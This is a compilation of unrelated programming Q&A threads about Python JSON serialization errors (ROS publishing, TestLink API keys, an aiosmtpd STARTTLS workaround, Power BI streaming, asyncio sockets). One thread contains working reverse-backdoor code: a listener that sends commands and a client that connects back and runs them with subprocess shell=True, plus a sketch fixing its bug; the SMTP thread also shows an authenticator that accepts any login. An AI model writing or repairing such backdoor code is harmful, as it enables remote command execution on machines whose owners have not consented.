Object of type ndarray is not JSON serializable - json

I am receiving data over a TCP socket and trying to publish it in std_msgs/Float64MultiArray format. However, when I convert the JSON data to a numpy array and publish it, I get the following error:
File "/usr/lib/python3.8/json/encoder.py", line 179, in default
raise TypeError(f'Object of type {o.__class__.__name__} '
TypeError: Object of type Int32MultiArray is not JSON serializable
Here is the code that receives data over TCP and sends it to rosbridge (topic /chatter):
import roslibpy
import socket
import time
import struct
import numpy as np
import json
from rospy.numpy_msg import numpy_msg
from rospy_tutorials.msg import Floats
from std_msgs.msg import String, Int32, Int32MultiArray, MultiArrayLayout, MultiArrayDimension, Float64MultiArray

# ROS Python Bridge
client = roslibpy.Ros(host='localhost', port=9090)  # same as rosbridge port
client.run()
print("Is ROS connected? ", client.is_connected)

talker = roslibpy.Topic(client, '/chatter', 'std_msgs/Float64MultiArray')
data_to_send = Float64MultiArray()  # the data to be sent, initialise the array

HOST = "0.0.0.0"  # Standard loopback interface address (localhost)
PORT = 8081       # Port to listen on (non-privileged ports are > 1023)

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.bind((HOST, PORT))
    while True:
        s.listen()
        conn, addr = s.accept()
        with conn:
            print(f"Connected by {addr}")
            while client.is_connected:
                data = conn.recv(1024)
                if not data:
                    break
                conn.sendall(data)
                data = json.loads(data)
                data_list = data[0]
                x_val = data_list['x']
                y_val = data_list['y']
                z_val = data_list['z']
                pos_arry = np.unique([x_val, y_val, z_val])
                pos_arry = pos_arry.tolist()
                my_array_for_publishing = Int32MultiArray(data=pos_arry)
                print(type(pos_arry))
                talker.publish(roslibpy.Message({'data': my_array_for_publishing}))
                print('Sending message...')

talker.unadvertise()
client.terminate()

This error can be resolved by sending the data as a plain Python list instead of a ROS message object (roslibpy serializes the message dictionary to JSON, and an Int32MultiArray instance is not JSON serializable):
pos_arry = np.unique([x_val, y_val, z_val])
pos_arry = pos_arry.tolist()
and retrieving the values on the subscriber side using .at(), for example in C++:
std_msgs::Float64MultiArray val = listener.data;
std::cout << val.data.at(0) << std::endl;
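For the publishing side, here is a minimal sketch of how the publish call could look once the numpy result is converted to a list, assuming the same talker topic and x_val, y_val, z_val as above (an illustrative fix, not code from the original post):
# Publish a plain list so roslibpy can serialize the message to JSON
pos_arry = np.unique([x_val, y_val, z_val]).tolist()  # numpy array -> Python list
talker.publish(roslibpy.Message({'data': pos_arry}))  # plain dict, no Int32MultiArray wrapper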

Parsing JSON element (Iterate over list of elements)

I created a script that writes a JSON file in which the list of my server URLs and API keys is stored. Now I need to get those elements (URL & API key) so that I can get all the users on each server. I'm stuck at the point where I need to iterate over all the server URLs and assign each one to a variable.
Below is my sample code.
import sys
import json
import testlink
import xmlrpc.client
import requests
import xml.etree.ElementTree as ET
import openpyxl
from openpyxl import Workbook

requests.packages.urllib3.disable_warnings()

# Create a Json file that compose of TESTLINK_API_PYTHON_SERVER_URL and TESTLINK_API_PYTHON_DEVKEY
def serverJson():
    serverDictionary = {
        "servers": [
            {
                "server_name": "https://firstInstance/lib/api/xmlrpc/v1/xmlrpc.php",
                "devKey": "1234567890abcdef"
            },
            {
                "server_name": "https://secondInstance/lib/api/xmlrpc/v1/xmlrpc.php",
                "devKey": "0987654321fedcba"
            }
        ]
    }
    # Create json file
    with open("server.json", "w") as server:
        json.dump(serverDictionary, server)

# Return TESTLINK_API_PYTHON_SERVER_URL and TESTLINK_API_PYTHON_DEVKEY
def serverList():
    serverJson()
    # Open json file
    server_file = open('server.json')
    # Return JSON Object as dictionary
    data = json.load(server_file)
    # Iterating through the json list
    for servers in data['servers']:
        serverName = servers.get('server_name')
        devKey = servers.get('devKey')
        print(serverName, devKey)
    # Start Testlink-API-Call
    TESTLINK_API_PYTHON_SERVER_URL = str()
    TESTLINK_API_PYTHON_DEVKEY = str()
    tls = testlink.TestlinkAPIClient(TESTLINK_API_PYTHON_SERVER_URL, TESTLINK_API_PYTHON_DEVKEY)
    # IF Else to each instance & devKey
    # First instance
    if TESTLINK_API_PYTHON_SERVER_URL == (firstServerURL) and TESTLINK_API_PYTHON_DEVKEY == (firstDevKey):
        print("----------User list for First Instance----------")
        tree = ET.parse('usersTLFirstInstance.xml')
        root = tree.getroot()
        for user in root.findall('user'):
            loginID = user.find('id').text
            for tl_first_user in tls.getUserByID(loginID):
                first_name = tl_first_user.get('firstName')
                print(loginID, first_name)
        print("----------Ending List for First Instance----------")
    # Second instance
    elif TESTLINK_API_PYTHON_SERVER_URL == (secondServerURL) and TESTLINK_API_PYTHON_DEVKEY == (secondDevKey):
        print("----------User list for Second Instance----------")
        tree = ET.parse('usersTLSecondInstance.xml')
        root = tree.getroot()
        for user in root.findall('user'):
            loginID = user.find('id').text
            for tl_second_user in tls.getUserByID(loginID):
                first_name = tl_second_user.get('firstName')
                print(loginID, first_name)
        print("----------Ending List for Second Instance----------")

serverList()
Here is the JSON file that the script creates.
{
    "servers": [
        {
            "server_name": "https://firstInstance/lib/api/xmlrpc/v1/xmlrpc.php",
            "devKey": "1234567890abcdef"
        },
        {
            "server_name": "https://secondInstance/lib/api/xmlrpc/v1/xmlrpc.php",
            "devKey": "0987654321fedcba"
        }
    ]
}
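Since the question is about turning that JSON into per-server API calls, here is a rough sketch of how the loop could build one TestlinkAPIClient per server instead of comparing against hard-coded URLs; the instance_xml mapping is a hypothetical helper added for illustration, not part of the original code:
import json
import testlink

with open("server.json") as server_file:
    data = json.load(server_file)

# Hypothetical mapping from each server URL to its exported XML user list
instance_xml = {
    "https://firstInstance/lib/api/xmlrpc/v1/xmlrpc.php": "usersTLFirstInstance.xml",
    "https://secondInstance/lib/api/xmlrpc/v1/xmlrpc.php": "usersTLSecondInstance.xml",
}

for server in data["servers"]:
    server_url = server["server_name"]
    dev_key = server["devKey"]
    tls = testlink.TestlinkAPIClient(server_url, dev_key)  # one client per server
    xml_file = instance_xml.get(server_url)
    print(server_url, dev_key, xml_file)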

SMTP STARTTLS format

Is the EHLO message required after the TLS connection has been established? I'm using an acorn ltl-6511M wildlife camera that doesn't seem to send an EHLO message after establishing the TLS connection, which causes a 503 error in my aiosmtpd-based SMTP server. It works with Gmail's SMTP server, though. Is the camera following the protocol, or is my server not robust enough?
The code I'm using is:
import email
from email.header import decode_header
from email import message_from_bytes
from email.policy import default
from aiosmtpd.controller import Controller
from aiosmtpd.smtp import LoginPassword, AuthResult
import os
import sys
import time
import signal
import logging
import ssl

## setting timezone
os.environ['TZ'] = "Europe/London"
time.tzset()

def onExit(sig, func=None):
    print("*************Stopping program*****************")
    controller.stop()
    exit()

signal.signal(signal.SIGTERM, onExit)

# removes the spaces and replaces with _ so they're valid folder names
def clean(text):
    return "".join(c if c.isalnum() else "_" for c in text)

log = logging.getLogger('mail.log')

auth_db = {
    b"TestCamera1#gmail.com": b"password1",
    b"user2": b"password2",
    b"TestCamera1": b"password1",
}

def authenticator_func(server, session, envelope, mechanism, auth_data):
    # this deliberately lets everything through
    assert isinstance(auth_data, LoginPassword)
    username = auth_data.login
    password = auth_data.password
    return AuthResult(success=True)

def configure_logging():
    file_handler = logging.FileHandler("aiosmtpd.log", "a")
    stderr_handler = logging.StreamHandler(sys.stderr)
    logger = logging.getLogger("mail.log")
    fmt = "[%(asctime)s %(levelname)s] %(message)s"
    datefmt = None
    formatter = logging.Formatter(fmt, datefmt, "%")
    stderr_handler.setFormatter(formatter)
    logger.addHandler(stderr_handler)
    file_handler.setFormatter(formatter)
    logger.addHandler(file_handler)
    logger.setLevel(logging.DEBUG)

class CustomHandler:
    def handle_exception(self, error):
        print("exception occured")
        print(error)
        return '542 Internal Server Error'

    async def handle_DATA(self, server, session, envelope):
        peer = session.peer
        data = envelope.content  # type: bytes
        msg = message_from_bytes(envelope.content, policy=default)
        # decode the email subject
        print("Msg:{}".format(msg))
        print("Data:{}".format(data))
        print("All of the relevant data has been extracted from the email")
        return '250 OK'

if __name__ == '__main__':
    configure_logging()
    handler = CustomHandler()
    # update hostname to your IP
    context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
    context.load_cert_chain('cert.pem', 'key.pem')
    controller = Controller(handler, hostname='0.0.0.0', port=587, authenticator=authenticator_func,
                            auth_required=True, auth_require_tls=True, tls_context=context)
    # Run the event loop in a separate thread.
    controller.start()
    while True:
        time.sleep(10)
The code after trying to integrate the suggested workaround (see the answer below) is:
import email
from email.header import decode_header
from email import message_from_bytes
from email.policy import default
from aiosmtpd.controller import Controller
from aiosmtpd.smtp import LoginPassword, AuthResult, SMTP
import os
import json
import re
import sys
import time
import signal
import logging
import ssl
from datetime import datetime
import configparser

## setting timezone
os.environ['TZ'] = "Europe/London"
time.tzset()

spacer = "*" * 100

def onExit(sig, func=None):
    print("*************Stopping program*****************", 3)
    controller.stop()
    exit()

signal.signal(signal.SIGTERM, onExit)

# removes the spaces and replaces with _ so they're valid folder names
def clean(text):
    return "".join(c if c.isalnum() else "_" for c in text)

log = logging.getLogger('mail.log')

auth_db = {
    b"TestCamera1#gmail.com": b"password1",
    b"user2": b"password2",
    b"TestCamera1": b"password1",
}

def authenticator_func(server, session, envelope, mechanism, auth_data):
    # Simple auth - is only being used because of the reolink cam
    assert isinstance(auth_data, LoginPassword)
    username = auth_data.login
    password = auth_data.password
    log.warning("Authenticator is being used")
    return AuthResult(success=True)

def configure_logging():
    file_handler = logging.FileHandler("aiosmtpd.log", "a")
    stderr_handler = logging.StreamHandler(sys.stderr)
    logger = logging.getLogger("mail.log")
    fmt = "[%(asctime)s %(levelname)s] %(message)s"
    datefmt = None
    formatter = logging.Formatter(fmt, datefmt, "%")
    stderr_handler.setFormatter(formatter)
    logger.addHandler(stderr_handler)
    file_handler.setFormatter(formatter)
    logger.addHandler(file_handler)
    logger.setLevel(logging.DEBUG)

class SMTPNoEhloAfterStarttls(SMTP):
    async def smtp_STARTTLS(self, arg: str):
        print(spacer)
        print("using starttls")
        host_name = self.session.host_name
        extended_smtp = self.session.extended_smtp
        await super().smtp_STARTTLS(arg)
        if host_name and extended_smtp and not self.session.host_name:
            # There was an EHLO before the STARTTLS.
            # RFC3207 says that we MUST reset the state
            # and forget the EHLO, but unfortunately
            # the client doesn't re-send the EHLO after STARTTLS,
            # so we need to pretend as if an EHLO has been sent.
            self.session.host_name = host_name
            self.session.extended_smtp = True

class ControllerNoEhloAfterStarttls(Controller):
    def factory(self):
        print(spacer)
        print("updating default settings")
        return SMTPNoEhloAfterStarttls(self.handler, **self.SMTP_kwargs)

class CustomHandler:
    def handle_exception(self, error):
        print("exception occured", 3)
        print(error)
        return '542 Internal Server Error'

    async def handle_DATA(self, server, session, envelope):
        peer = session.peer
        data = envelope.content  # type: bytes
        msg = message_from_bytes(envelope.content, policy=default)
        # decode the email subject
        print("Msg:{}".format(msg), 3)
        print("Data:{}".format(data), 3)
        print("All of the relevant data has been extracted from the email", 3)
        print(spacer, 3)
        return '250 OK'

if __name__ == '__main__':
    configure_logging()
    handler = CustomHandler()
    # controller = Controller(handler, hostname='10.200.68.132', port=587)
    context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
    context.load_cert_chain('cert.pem', 'key.pem')
    controller = Controller(handler, hostname='10.200.68.133', port=587, authenticator=authenticator_func,
                            auth_required=True, auth_require_tls=True, tls_context=context)
    # Run the event loop in a separate thread.
    controller.start()
    # Confirmed that this is needed to keep the SMTP server running constantly
    while True:
        time.sleep(10)
However, this hasn't made any difference to the error logs.
Yes, EHLO is required after STARTTLS, see RFC3207 Section 4.2 (which specifically mentions forgetting the EHLO line - emphasis mine):
Upon completion of the TLS handshake, the SMTP protocol is reset to
the initial state (the state in SMTP after a server issues a 220
service ready greeting). The server MUST discard any knowledge
obtained from the client, such as the argument to the EHLO command,
which was not obtained from the TLS negotiation itself.
This means that unfortunately your camera is not following the SMTP protocol. It is also unfortunate that GMail SMTP does not follow the protocol (it doesn't require EHLO in-between STARTTLS and AUTH LOGIN).
aiosmtpd is quite insistent on following the SMTP protocol and duly forgets the EHLO data that was sent before the STARTTLS; the EHLO hostname is stored in self.session.host_name on the aiosmtpd.smtp.SMTP object, and self.session is reset in SMTP.connection_made(), which is invoked again after STARTTLS.
It is possible to make aiosmtpd break the SMTP specification and act in a highly non-conforming way. Obviously this is something you MUST NOT do in production. Use the ControllerNoEhloAfterStarttls defined below instead of the standard aiosmtpd Controller and then it should work.
from aiosmtpd.smtp import SMTP
from aiosmtpd.controller import Controller

class SMTPNoEhloAfterStarttls(SMTP):
    async def smtp_STARTTLS(self, arg: str):
        host_name = self.session.host_name
        extended_smtp = self.session.extended_smtp
        await super().smtp_STARTTLS(arg)
        if host_name and extended_smtp and not self.session.host_name:
            # There was an EHLO before the STARTTLS.
            # RFC3207 says that we MUST reset the state
            # and forget the EHLO, but unfortunately
            # the client doesn't re-send the EHLO after STARTTLS,
            # so we need to pretend as if an EHLO has been sent.
            self.session.host_name = host_name
            self.session.extended_smtp = True

class ControllerNoEhloAfterStarttls(Controller):
    def factory(self):
        return SMTPNoEhloAfterStarttls(self.handler, **self.SMTP_kwargs)
...and then down in if __name__ == "__main__":, instantiate the custom controller class instead of the default Controller:
controller = ControllerNoEhloAfterStarttls(handler, hostname='10.200.68.133', port=587, ......)

I get the error "Object of type bytes is not JSON serializable" while testing my reverse_backdoor against my real computer

I have Python 2 on my VM and my code is as follows:
#!/usr/bin/env python
import socket, json

class Listener:
    def __init__(self, ip, port):
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((ip, port))
        listener.listen(0)
        print("[+] Waiting for incoming connection")
        self.connection, address = listener.accept()
        print("[+] Got a connection from " + str(address))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def reliable_recieve(self):
        json_data = ""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_remotely(self, command):
        self.reliable_send(command)
        return self.reliable_recieve()

    def run(self):
        while True:
            command = raw_input(">> ")
            result = self.execute_remotely(command)
            print(result)

my_listener = Listener("ip adress", 4444)
my_listener.run()
And my target computer has Python 3 and the code is as follows:
#!/usr/bin/env python
import socket, subprocess
import json

class Backdoor:
    def __init__(self, ip, port):
        self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.connection.connect((ip, port))

    def reliable_send(self, data):
        json_data = json.dumps(data)
        self.connection.send(json_data)

    def reliable_recieve(self):
        json_data = ""
        while True:
            try:
                json_data = json_data + self.connection.recv(1024)
                return json.loads(json_data)
            except ValueError:
                continue

    def execute_system_command(self, command):
        return subprocess.check_output(command, shell=True)

    def run(self):
        while True:
            command = self.reliable_recieve()
            command_result = self.execute_system_command(command)
            self.reliable_send(command_result)
        connection.close()

my_backdoor = Backdoor("ip address", 4444)
my_backdoor.run()
When I run this I get the error mentioned in the title. I have tried to decode the json_data with the utf-8 argument, but the problem persists. The listener works in my VM, but on my real PC it shows this error, and if I decode my json_data it shows the error "Object of type bytes is not JSON serializable".
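For reference, a minimal sketch of the usual fix for this error on the Python 3 side, keeping the question's method names (an assumption-laden illustration, not the author's solution): subprocess.check_output() returns bytes, which json.dumps() cannot serialize, and on Python 3 socket.send() requires bytes, so the helpers have to decode before dumping and encode before sending.
# Sketch for the Python 3 backdoor side; assumes the command output decodes as UTF-8.
def reliable_send(self, data):
    if isinstance(data, bytes):
        data = data.decode("utf-8")  # bytes are not JSON serializable
    json_data = json.dumps(data)
    self.connection.send(json_data.encode("utf-8"))  # sockets send bytes, not str

def reliable_recieve(self):
    json_data = b""
    while True:
        try:
            json_data = json_data + self.connection.recv(1024)
            return json.loads(json_data.decode("utf-8"))
        except ValueError:
            continue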

"TypeError: Object of type 'bytes' is not JSON serializable" live streaming data

I am trying to live stream data into Power BI from Python. However, I am encountering the error:
TypeError: Object of type 'bytes' is not JSON serializable
I have put my code below; please point out what I am doing wrong, as I don't quite understand what the issue is.
import pandas as pd
from datetime import datetime
from datetime import timedelta
import requests
import json
import time
import random

# function for data_generation
def data_generation():
    surr_id = random.randint(1, 3)
    speed = random.randint(20, 200)
    date = datetime.today().strftime("%Y-%m-%d")
    time = datetime.now().isoformat()
    return [surr_id, speed, date, time]

if __name__ == '__main__':
    REST_API_URL = 'api_url'
    while True:
        data_raw = []
        for j in range(1):
            row = data_generation()
            data_raw.append(row)
        print("Raw data - ", data_raw)
        # set the header record
        HEADER = ["surr_id", "speed", "date", "time"]
        data_df = pd.DataFrame(data_raw, columns=HEADER)
        data_json = bytes(data_df.to_json(orient='records'), encoding='utf-8')
        print("JSON dataset", data_json)
        # Post the data on the Power BI API
        try:
            req = requests.post(REST_API_URL, data=json.dumps(data_json), headers=HEADER, timeout=5)
            print("Data posted in Power BI API")
        except requests.exceptions.ConnectionError as e:
            req = "No response"
        print(req)
        time.sleep(3)
Solved. I just changed req = requests.post(REST_API_URL, data=json.dumps(data_json), headers=HEADER, timeout=5) to req = requests.post(url=REST_API_URL, data=data_json).
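To make the reasoning concrete, here is a short sketch of why that change works, assuming the rest of the loop stays the same: data_df.to_json() already returns a JSON string, so wrapping it in bytes() and then calling json.dumps() on those bytes is what raises the TypeError; the string can be posted directly (the Content-Type header below is an illustrative addition, not from the original post):
# data_df.to_json() already produces a JSON string; post it as-is.
data_json = data_df.to_json(orient='records')
try:
    req = requests.post(url=REST_API_URL,
                        data=data_json,
                        headers={"Content-Type": "application/json"},  # assumption, not in the original
                        timeout=5)
    print("Data posted in Power BI API")
except requests.exceptions.ConnectionError:
    req = "No response"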

Python 3.6 asyncio send json message error

I'm trying to set-up a TCP echo client and server that can exchange messages using the JSON format.
I took the code from the documentation and modified it as follows:
Edit: includes the fix and has both server and client send JSON-style messages.
import asyncio
# https://docs.python.org/3/library/asyncio-stream.html
import json

async def handle_echo(reader, writer):
    data = await reader.read(100)
    message = json.loads(data.decode())
    addr = writer.get_extra_info('peername')
    print("Received %r from %r" % (message, addr))
    print("Send: %r" % json.dumps(message))  # message
    json_mess_en = json.dumps(message).encode()
    writer.write(json_mess_en)
    #writer.write(json_mess)             # not working
    #writer.write(json.dumps(json_mess)) # not working
    # Yielding from drain() gives the opportunity for the loop to schedule the write operation
    # and flush the buffer. It should especially be used when a possibly large amount of data
    # is written to the transport, and the coroutine does not yield-from between calls to write().
    #await writer.drain()
    #print("Close the client socket")
    writer.close()

loop = asyncio.get_event_loop()
coro = asyncio.start_server(handle_echo, '0.0.0.0', 9090, loop=loop)
server = loop.run_until_complete(coro)

# Serve requests until Ctrl+C is pressed
print('Serving on {}'.format(server.sockets[0].getsockname()))
try:
    loop.run_forever()
except KeyboardInterrupt:
    pass

# Close the server
server.close()
loop.run_until_complete(server.wait_closed())
loop.close()
and the client code:
import asyncio
import json

async def tcp_echo_client(message, loop):
    reader, writer = await asyncio.open_connection('0.0.0.0', 9090, loop=loop)
    print('Send: %r' % message)
    writer.write(json.dumps(message).encode())
    data = await reader.read(100)
    data_json = json.loads(data.decode())
    print('Received: %r' % data_json)
    print(data_json['welcome'])
    print('Close the socket')
    writer.close()

message = {'welcome': 'Hello World!'}
loop = asyncio.get_event_loop()
loop.run_until_complete(tcp_echo_client(message, loop))
loop.close()
The error is:
TypeError: data argument must be a bytes-like object, not 'str'
Should I use a function other than writer.write to encode the data as JSON? Any suggestions?
Found the solution: replace
writer.write(json.dumps(json_mess))
with
# encode as 'UTF8'
json_mess_en = json.dumps(json_mess).encode()
writer.write(json_mess_en)